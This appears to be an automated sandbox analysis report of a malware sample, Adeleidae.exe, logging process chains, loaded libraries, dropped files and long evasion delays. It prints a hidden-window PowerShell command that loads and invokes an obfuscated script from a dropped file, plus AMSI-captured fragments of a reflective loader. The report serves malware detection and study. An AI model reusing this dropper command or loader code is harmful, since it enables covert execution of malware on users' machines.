Source: C:\Users\user\Desktop\Adeleidae.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Damascenere.lnk.0.dr LNK file: ..\..\..\..\..\..\..\ProgramData\Polyhistorisk\fagbladsjournalistens.ugi
Source: C:\Users\user\Desktop\Adeleidae.exe File written: C:\Windows\Resources\Nebengeschfter.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Adeleidae.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tem.Core.pdbt source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.Core.pdbfu source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000001.00000002.2435373853.0000000009251000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Pennefejdes $Ungdomsoprrenes $Formernes), (Diffusionslinsen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Unaccessibleness = [AppDomain]::CurrentDomain.G
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Baccalaureat)), $Dampsskibsselskabets).DefineDynamicModule($Normaltseende1, $false).DefineType($Nutriture33, $Yanggona, [System.Multic
Source: C:\Users\user\Desktop\Adeleidae.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"
Source: C:\Users\user\Desktop\Adeleidae.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04CDCA78 push eax; mov dword ptr [esp], edx 1_2_04CDCA8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04CDD610 push esp; iretd 1_2_04CDD611
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04CDD0B0 pushad ; retf 1_2_04CDD0B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0781E5AC push eax; retf 1_2_0781E5AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_090F03C0 push 8BD68B50h; retf 1_2_090F03C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_090F4548 push 8BD38B50h; iretd 1_2_090F454E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8891E pushad ; iretd 6_2_02A8891F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A88C2F pushfd ; iretd 6_2_02A88C30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A88DDF push esp; iretd 6_2_02A88DE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599867 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599745 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599640 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599202 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598656 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598544 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597999 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597671 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597124 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596792 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596577 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596140 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595921 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595593 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595265 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595156 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595046 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6893 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2882 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -27670116110564310s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599867s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4008 Thread sleep count: 1258 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4008 Thread sleep count: 8603 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599745s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599640s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599531s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599421s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599312s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599202s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -599093s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598984s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598874s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598765s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598656s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598544s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598437s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598328s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598218s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -598109s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597999s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597890s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597781s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597671s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597562s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597453s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597343s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597234s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597124s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -597015s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596906s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596792s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596687s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596577s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596468s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596250s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596140s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -596031s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595921s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595812s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595703s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595593s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595484s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595375s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595265s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595156s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -595046s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -594937s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -594828s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -594718s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3164 Thread sleep time: -594609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405846
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00406398 FindFirstFileW,FindClose, 0_2_00406398
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599867 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599745 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599640 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599202 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598656 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598544 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597999 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597781 Jump to behavior
